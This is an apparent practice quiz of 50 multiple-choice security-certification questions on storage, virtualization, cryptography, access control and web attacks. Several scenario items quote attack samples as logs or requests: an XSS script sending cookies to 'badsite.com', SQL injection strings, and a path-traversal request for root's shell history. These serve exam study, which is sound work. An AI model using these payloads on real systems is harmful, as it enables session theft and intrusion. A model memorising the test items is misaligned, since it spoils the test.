CAS-002 First 50

A visually engaging image depicting a digital security theme with padlocks, firewalls, and data protection symbols in a high-tech environment.

Master Your Security Knowledge

Test your expertise in security concepts and technologies with this comprehensive quiz designed for professionals in the field. With 50 questions covering a variety of topics, you'll have the opportunity to challenge your understanding and identify areas for improvement.

  • Multiple choice questions
  • Focus on real-world scenarios
  • Enhance your security skills
50 Questions12 MinutesCreated by SecuringSky973
An administrator wants to enable policy based flexible mandatory access controls on an open source OS to prevent abnormal application modifications or executions. Which of the following would BEST accomplish this?
Access control lists
SELinux
IPtables firewall
HIPS
Company ABC’s SAN is nearing capacity, and will cause costly downtimes if servers run out disk space. Which of the following is a more cost effective alternative to buying a new SAN?
Enable multipath to increase availability
Enable deduplication on the storage pools
Implement snapshots to reduce virtual disk size
Implement replication to offsite datacenter
A systems administrator establishes a CIFS share on a UNIX device to share data to Windows systems. The security authentication on the Windows domain is set to the highest level. Windows users are stating that they cannot authenticate to the UNIX share. Which of the following settings on the UNIX server would correct this problem?
Refuse LM and only accept NTLMv2
Accept only LM
Refuse NTLMv2 and accept LM
Accept only NTLM
A security architect is designing a new infrastructure using both type 1 and type 2 virtual machines. In addition to the normal complement of security controls (e.g. antivirus, host hardening, HIPS/NIDS) the security architect needs to implement a mechanism to securely store cryptographic keys used to sign code and code modules on the VMs. Which of the following will meet this goal without requiring any hardware pass-through implementations?
VTPM
HSM
TPM
INE
A user has a laptop configured with multiple operating system installations. The operating systems are all installed on a single SSD, but each has its own partition and logical volume. Which of the following is the BEST way to ensure confidentiality of individual operating system data?
Encryption of each individual partition
Encryption of the SSD at the file level
FDE of each logical volume on the SSD
FDE of the entire SSD as a single disk
After being notified of an issue with the online shopping cart, where customers are able to arbitrarily change the price of listed items, a programmer analyzes the following piece of code used by a web based shopping cart. SELECT ITEM FROM CART WHERE ITEM=ADDSLASHES($USERINPUT); The programmer found that every time a user adds an item to the cart, a temporary file is created on the web server /tmp directory. The temporary file has a name which is generated by concatenating the content of the $USERINPUT variable and a timestamp in the form of MM-DDYYYY, (e.g. smartphone-12-25-2013.tmp) containing the price of the item being purchased. Which of the following is MOST likely being exploited to manipulate the price of a shopping cart’s items?
Input validation
SQL injection
TOCTOU
Session hijacking
The administrator is troubleshooting availability issues on an FCoE-based storage array that uses deduplication. The single controller in the storage array has failed, so the administrator wants to move the drives to a storage array from a different manufacturer in order to access the data. Which of the following issues may potentially occur?
The data may not be in a usable format.
The new storage array is not FCoE based.
The data may need a file system check.
The new storage array also only has a single controller.
Joe, a hacker, has discovered he can specifically craft a webpage that when viewed in a browser crashes the browser and then allows him to gain remote code execution in the context of the victim’s privilege level. The browser crashes due to an exception error when a heap memory that is unused is accessed. Which of the following BEST describes the application issue?
Integer overflow
Click-jacking
Race condition
SQL injection
Use after free
Input validation
A developer is determining the best way to improve security within the code being developed. The developer is focusing on input fields where customers enter their credit card details. Which of the following techniques, if implemented in the code, would be the MOST effective in protecting the fields from malformed input?
Client side input validation
Stored procedure
Encrypting credit card details
Regular expression matching
A security administrator was doing a packet capture and noticed a system communicating with an unauthorized address within the 2001::/32 prefix. The network administrator confirms there is no IPv6 routing into or out of the network. Which of the following is the BEST course of action?
Investigate the network traffic and block UDP port 3544 at the firewall
Remove the system from the network and disable IPv6 at the router
Locate and remove the unauthorized 6to4 relay from the network
Disable the switch port and block the 2001::/32 traffic at the firewall
A popular commercial virtualization platform allows for the creation of virtual hardware. To virtual machines, this virtual hardware is indistinguishable from real hardware. By implementing virtualized TPMs, which of the following trusted system concepts can be implemented?
Software-based root of trust
Continuous chain of trust
Chain of trust with a hardware root of trust
Software-based trust anchor with no root of trust
An organization is concerned with potential data loss in the event of a disaster, and created a backup datacenter as a mitigation strategy. The current storage method is a single NAS used by all servers in both datacenters. Which of the following options increases data availability in the event of a datacenter failure?
Replicate NAS changes to the tape backups at the other datacenter.
Ensure each server has two HBAs connected through two routes to the NAS.
Establish deduplication across diverse storage paths.
Establish a SAN that replicates between datacenters.
An application present on the majority of an organization’s 1,000 systems is vulnerable to a buffer overflow attack. Which of the following is the MOST comprehensive way to resolve the issue?
Deploy custom HIPS signatures to detect and block the attacks.
Validate and deploy the appropriate patch.
Run the application in terminal services to reduce the threat landscape.
Deploy custom NIPS signatures to detect and block the attacks.
A security administrator notices the following line in a server's security log: <script>document.location='http://badsite.com/?q='document.cookie') + "'; The administrator is concerned that it will take the developer a lot of time to fix the application that is running on the server. Which of the following should the security administrator implement to prevent this particular attack?
WAF
Input validation
SIEM
Sandboxing
DAM
A government agency considers confidentiality to be of utmost importance and availability issues to be of least importance. Knowing this, which of the following correctly orders various vulnerabilities in the order of MOST important to LEAST important?
Insecure direct object references, CSRF, Smurf
Privilege escalation, Application DoS, Buffer overflow
SQL injection, Resource exhaustion, Privilege escalation
CSRF, Fault injection, Memory leaks
A security administrator wants to deploy a dedicated storage solution which is inexpensive, can natively integrate with AD, allows files to be selectively encrypted and is suitable for a small number of users at a satellite office. Which of the following would BEST meet the requirement?
SAN
NAS
Virtual SAN
Virtual storage
At 9:00 am each morning, all of the virtual desktops in a VDI implementation become extremely slow and/or unresponsive. The outage lasts for around 10 minutes, after which everything runs properly again. The administrator has traced the problem to a lab of thin clients that are all booted at 9:00 am each morning. Which of the following is the MOST likely cause of the problem and the BEST solution? (Select TWO).
Add guests with more memory to increase capacity of the infrastructure.
A backup is running on the thin clients at 9am every morning.
Install more memory in the thin clients to handle the increased load while booting.
Booting all the lab desktops at the same time is creating excessive I/O.
Install 10-Gb uplinks between the hosts and the lab to increase network capacity.
Install faster SSD drives in the storage system used in the infrastructure.
The lab desktops are saturating the network while booting.
The lab desktops are using more memory than is available to the host systems.
A security administrator is shown the following log excerpt from a Unix system: 2013 Oct 10 07:14:57 web14 sshd[1632]: Failed password for root from 198.51.100.23 port 37914 ssh2 2013 Oct 10 07:14:57 web14 sshd[1635]: Failed password for root from 198.51.100.23 port 37915 ssh2 2013 Oct 10 07:14:58 web14 sshd[1638]: Failed password for root from 198.51.100.23 port 37916 ssh2 2013 Oct 10 07:15:59 web14 sshd[1640]: Failed password for root from 198.51.100.23 port 37918 ssh2 2013 Oct 10 07:16:00 web14 sshd[1641]: Failed password for root from 198.51.100.23 port 37920 ssh2 2013 Oct 10 07:16:00 web14 sshd[1642]: Successful login for root from 198.51.100.23 port 37924 ssh2 Which of the following is the MOST likely explanation of what is occurring and the BEST immediate response? (Select TWO).
An authorized administrator has logged into the root account remotely.
The administrator should disable remote root logins.
Isolate the system immediately and begin forensic analysis on the host.
A remote attacker has compromised the root account using a buffer overflow in sshd.
A remote attacker has guessed the root password using a dictionary attack.
Use iptables to immediately DROP connections from the IP 198.51.100.23.
A remote attacker has compromised the private key of the root account.
Change the root password immediately to a password not found in a dictionary.
A security administrator wants to prevent sensitive data residing on corporate laptops and desktops from leaking outside of the corporate network. The company has already implemented full-disk encryption and has disabled all peripheral devices on its desktops and laptops. Which of the following additional controls MUST be implemented to minimize the risk of data leakage? (Select TWO).
A full-system backup should be implemented to a third-party provider with strong encryption for data in transit.
A DLP gateway should be installed at the company border.
Strong authentication should be implemented via external biometric devices.
Full-tunnel VPN should be required for all network communication.
Full-drive file hashing should be implemented with hashes stored on separate storage.
Split-tunnel VPN should be enforced when transferring sensitive data.
select id, firstname, lastname from authors User input= firstname= Hack;man lastname=Johnson
 
Which of the following types of attacks is the user attempting?
XML injection
Command injection
Cross-site scripting
SQL injection
The risk manager has requested a security solution that is centrally managed, can easily be updated, and protects end users' workstations from both known and unknown malicious attacks when connected to either the office or home network. Which of the following would BEST meet this requirement?
HIPS
UTM
Antivirus
NIPS
DLP
Which of the following describes a risk and mitigation associated with cloud data storage?
Risk: Shared hardware caused data leakage Mitigation: Strong encryption at rest
Risk: Offsite replication Mitigation: Multi-site backups
Risk: Data loss from de-duplication Mitigation: Dynamic host bus addressing
Risk: Combined data archiving Mitigation: Two-factor administrator authentication
A developer has implemented a piece of client-side JavaScript code to sanitize a user’s provided input to a web page login screen. The code ensures that only the upper case and lower case letters are entered in the username field, and that only a 6-digit PIN is entered in the password field. A security administrator is concerned with the following web server log: 10.235.62.11 – - [02/Mar/2014:06:13:04] “GET /site/script.php?user=admin&pass=pass%20or%201=1 HTTP/1.1” 200 5724 Given this log, which of the following is the security administrator concerned with and which fix should be implemented by the developer?
The security administrator is concerned with nonprintable characters being used to gain administrative access, and the developer should strip all nonprintable characters.
The security administrator is concerned with XSS, and the developer should normalize Unicode characters on the browser side.
The security administrator is concerned with SQL injection, and the developer should implement server side input validation.
The security administrator is concerned that someone may log on as the administrator, and the developer should ensure strong passwords are enforced.
The security administrator finds unauthorized tables and records, which were not present before, on a Linux database server. The database server communicates only with one web server, which connects to the database server via an account with SELECT only privileges. Web server logs show the following: 90.76.165.40 – - [08/Mar/2014:10:54:04] “GET calendar.php?create%20table%20hidden HTTP/1.1” 200 5724 90.76.165.40 – - [08/Mar/2014:10:54:05] “GET ../../../root/.bash_history HTTP/1.1” 200 5724 90.76.165.40 – - [08/Mar/2014:10:54:04] “GET index.php?user=<script>Create</script> HTTP/1.1” 200 5724 The security administrator also inspects the following file system locations on the database server using the command ‘ls -al /root’ drwxrwxrwx 11 root root 4096 Sep 28 22:45 . drwxr-xr-x 25 root root 4096 Mar 8 09:30 .. -rws------ 25 root root 4096 Mar 8 09:30 .bash_history -rw------- 25 root root 4096 Mar 8 09:30 .bash_history -rw------- 25 root root 4096 Mar 8 09:30 .profile -rw------- 25 root root 4096 Mar 8 09:30 .ssh Which of the following attacks was used to compromise the database server and what can the security administrator implement to detect such attacks in the future? (Select TWO).
Privilege escalation
Brute force attack
SQL injection
Cross-site scripting
Using input validation, ensure the following characters are sanitized: <>
Update crontab with: find / \( -perm -4000 \) –type f –print0 | xargs -0 ls –l | email.sh
Implement the following PHP directive: $clean_user_input = addslashes($user_input)
Set an account lockout policy
An administrator is tasked with securing several website domains on a web server. The administrator elects to secure www.example.com, mail.example.org, archive.example.com, and www.example.org with the same certificate. Which of the following would allow the administrator to secure those domains with a single issued certificate?
Intermediate Root Certificate
Wildcard Certificate
EV x509 Certificate
Subject Alternative Names Certificate
Which of the following technologies prevents an unauthorized HBA from viewing iSCSI target information?
Deduplication
Data snapshots
LUN masking
Storage multipaths
Company ABC is hiring customer service representatives from Company XYZ. The representatives reside at Company XYZ’s headquarters. Which of the following BEST prevents Company XYZ representatives from gaining access to unauthorized Company ABC systems?
Require each Company XYZ employee to use an IPSec connection to the required systems
Require Company XYZ employees to establish an encrypted VDI session to the required systems
Require Company ABC employees to use two-factor authentication on the required systems
Require a site-to-site VPN for intercompany communications
A vulnerability scanner report shows that a client-server host monitoring solution operating in the credit card corporate environment is managing SSL sessions with a weak algorithm which does not meet corporate policy. Which of the following are true statements? (Select TWO).
The X509 V3 certificate was issued by a non-trusted public CA.
The client-server handshake could not negotiate strong ciphers.
The client-server handshake is configured with a wrong priority.
The client-server handshake is based on TLS authentication
The X509 V3 certificate is expired.
The client-server implements client-server mutual authentication with different certificates.
Which of the following represents important technical controls for securing a SAN storage infrastructure? (Select TWO).
Synchronous copy of data
RAID configuration
Data de-duplication
Storage pool space allocation
Port scanning
LUN masking/mapping
Port mapping
An enterprise must ensure that all devices that connect to its networks have been previously approved. The solution must support dual factor mutual authentication with strong identity assurance. In order to reduce costs and administrative overhead, the security architect wants to outsource identity proofing and second factor digital delivery to the third party. Which of the following solutions will address the enterprise requirements?
Implementing federated network access with the third party.
Using a HSM at the network perimeter to handle network device access.
Using a VPN concentrator which supports dual factor via hardware tokens.
Implementing 802.1x with EAP-TTLS across the infrastructure.
A security administrator is performing VDI traffic data collection on a virtual server which migrates from one host to another. While reviewing the data collected by the protocol analyzer, the security administrator notices that sensitive data is present in the packet capture. Which of the following should the security administrator recommend to ensure the confidentiality of sensitive information during live VM migration, while minimizing latency issues?
A separate physical interface placed on a private VLAN should be configured for live host operations.
Database record encryption should be used when storing sensitive information on virtual servers.
Full disk encryption should be enabled across the enterprise to ensure the confidentiality of sensitive data.
Sensitive data should be stored on a backend SAN which uses an isolated fiber channel network.
A penetration tester is inspecting traffic on a new mobile banking application and sends the following web request: POST http://www.example.com/resources/NewBankAccount HTTP/1.1 Content-type: application/json { “account”: [ { “creditAccount”:”Credit Card Rewards account”} { “salesLeadRef”:”www.example.com/badcontent/exploitme.exe”} ], “customer”: [ { “name”:”Joe Citizen”} { “custRef”:”3153151”} ] } The banking website responds with: HTTP/1.1 200 OK { “newAccountDetails”: [ { “cardNumber”:”1234123412341234”} { “cardExpiry”:”2020-12-31”} { “cardCVV”:”909”} ], “marketingCookieTracker”:“JSESSIONID=000000001” “returnCode”:“Account added successfully” } Which of the following are security weaknesses in this example? (Select TWO).
Missing input validation on some fields
Vulnerable to SQL injection
Sensitive details communicated in clear-text
Vulnerable to XSS
Vulnerable to malware file uploads
JSON/REST is not as secure as XML
Joe, a penetration tester, is tasked with testing the security robustness of the protocol between a mobile web application and a RESTful application server. Which of the following security tools would be required to assess the security between the mobile web application and the RESTful application server? (Select TWO).
Jailbroken mobile device
Reconnaissance tools
Network enumerator
HTTP interceptor
Vulnerability scanner
Password cracker
Ann is testing the robustness of a marketing website through an intercepting proxy. She has intercepted the following HTTP request: POST /login.aspx HTTP/1.1 Host: comptia.org Content-type: text/html txtUsername=ann&txtPassword=ann&alreadyLoggedIn=false&submit=true Which of the following should Ann perform to test whether the website is susceptible to a simple authentication bypass?
Remove all of the post data and change the request to /login.aspx from POST to GET
Attempt to brute force all usernames and passwords using a password cracker
Remove the txtPassword post data and change alreadyLoggedIn from false to true
Remove the txtUsername and txtPassword post data and toggle submit from true to false
An organization has implemented an Agile development process for front end web application development. A new security architect has just joined the company and wants to integrate security activities into the SDLC. Which of the following activities MUST be mandated to ensure code quality from a security perspective? (Select TWO).
Tatic and dynamic analysis is run as part of integration
Security standards and training is performed as part of the project
Daily stand-up meetings are held to ensure security requirements are understood
For each major iteration penetration testing is performed
Security requirements are story boarded and make it into the build
A security design is performed at the end of the requirements phase
ABC Corporation uses multiple security zones to protect systems and information, and all of the VM hosts are part of a consolidated VM infrastructure. Each zone has different VM administrators. Which of the following restricts different zone administrators from directly accessing the console of a VM host from another zone?
Ensure hypervisor layer firewalling between all VM hosts regardless of security zone.
Maintain a separate virtual switch for each security zone and ensure VM hosts bind to only the correct virtual NIC(s).
Organize VM hosts into containers based on security zone and restrict access using an ACL.
Require multi-factor authentication when accessing the console at the physical VM host.
A security administrator has been asked to select a cryptographic algorithm to meet the criteria of a new application. The application utilizes streaming video that can be viewed both on computers and mobile devices. The application designers have asked that the algorithm support the transport encryption with the lowest possible performance overhead. Which of the following recommendations would BEST meet the needs of the application designers? (Select TWO).
Use AES in Electronic Codebook mode
Use RC4 in Cipher Block Chaining mode
Use RC4 with Fixed IV generation
Use AES with cipher text padding
Use RC4 with a nonce generated IV
Use AES in Counter mode
ABC Company must achieve compliance for PCI and SOX. Which of the following would BEST allow the organization to achieve compliance and ensure security? (Select THREE).
Establish a list of users that must work with each regulation
Establish a list of devices that must meet each regulation
Centralize management of all devices on the network
Compartmentalize the network
Establish a company framework
Apply technical controls to meet compliance with the regulation
A pentester must attempt to crack passwords on a windows domain that enforces strong complex passwords. Which of the following would crack the MOST passwords in the shortest time period?
Online password testing
Rainbow tables attack
Dictionary attack
Brute force attack
An administrator has enabled salting for users' passwords on a UNIX box. A penetration tester must attempt to retrieve password hashes. Which of the following files must the penetration tester use to eventually obtain passwords on the system? (Select TWO).
/etc/passwd
/etc/shadow
/etc/security
/etc/password
/sbin/logon
/bin/bash
A bank is in the process of developing a new mobile application. The mobile client renders content and communicates back to the company servers via REST/JSON calls. The bank wants to ensure that the communication is stateless between the mobile application and the web services gateway. Which of the following controls MUST be implemented to enable stateless communication?
Generate a one-time key as part of the device registration process.
Require SSL between the mobile application and the web services gateway.
The jsession cookie should be stored securely after authentication.
Authentication assertion should be stored securely on the client.
A company that must comply with regulations is searching for a laptop encryption product to use for its 40,000 end points. The product must meet regulations but also be flexible enough to minimize overhead and support in regards to password resets and lockouts. Which of the following implementations would BEST meet the needs?
A partition-based software encryption product with a low-level boot protection and authentication
A container-based encryption product that allows the end users to select which files to encrypt
A full-disk hardware-based encryption product with a low-level boot protection and authentication
A file-based encryption product using profiles to target areas on the file system to encrypt
A company decides to purchase commercially available software packages. This can introduce new security risks to the network. Which of the following is the BEST description of why this is true?
Commercially available software packages are typically well known and widely available. Information concerning vulnerabilities and viable attack patterns are never revealed by the developer to avoid lawsuits.
Commercially available software packages are often widely available. Information concerning vulnerabilities is often kept internal to the company that developed the software.
Commercially available software packages are not widespread and are only available in limited areas. Information concerning vulnerabilities is often ignored by business managers.
Commercially available software packages are well known and widely available. Information concerning vulnerabilities and viable attack patterns are always shared within the IT community.
A storage as a service company implements both encryption at rest as well as encryption in transit of customers’ data. The security administrator is concerned with the overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the customer’s encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customers’ data would take?
Key = NULL ; for (int i=0; i<5000; i++) { key = sha(key + password) }
Password = NULL ; for (int i=0; i<10000; i++) { password = sha256(key) }
Password = password + sha(password+salt) + aes256(password+salt)
Key = aes128(sha256(password), password))
A security administrator has noticed that an increased number of employees’ workstations are becoming infected with malware. The company deploys an enterprise antivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the company implements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reduce malware infection?
Implement an Acceptable Use Policy which addresses malware downloads.
Deploy a network access control system with a persistent agent.
Enforce mandatory security awareness training for all employees and contractors.
Block cloud-based storage software on the company network.
ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC counter-based codes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe?
TOTP
CHAP
HOTP
PAP
A security tester is testing a website and performs the following manual query: https://www.comptia.com/cookies.jsp?products=5%20and%201=1 The following response is received in the payload: “ORA-000001: SQL command not properly ended” Which of the following is the response an example of?
Fingerprinting
Cross-site scripting
SQL injection
Privilege escalation
An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network. Which of the following is the administrator attempting to prevent?
BGP route hijacking attacks
Bogon IP network traffic
IP spoofing attacks
Man-in-the-middle attacks
Amplified DDoS attacks
Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased?
0
1
3
6
A senior network security engineer has been tasked to decrease the attack surface of the corporate network. Which of the following actions would protect the external network interfaces from external attackers performing network scanning?
Remove contact details from the domain name registrar to prevent social engineering attacks.
Test external interfaces to see how they function when they process fragmented IP packets
Enable a honeynet to capture and facilitate future analysis of malicious attack vectors.
Filter all internal ICMP message traffic, forcing attackers to use full-blown TCP port scans against external network interfaces.
{"name":"CAS-002 First 50", "url":"https://www.quiz-maker.com/QPREVIEW","txt":"Test your expertise in security concepts and technologies with this comprehensive quiz designed for professionals in the field. With 50 questions covering a variety of topics, you'll have the opportunity to challenge your understanding and identify areas for improvement.Multiple choice questionsFocus on real-world scenariosEnhance your security skills","img":"https:/images/course1.png"}
Powered by: Quiz Maker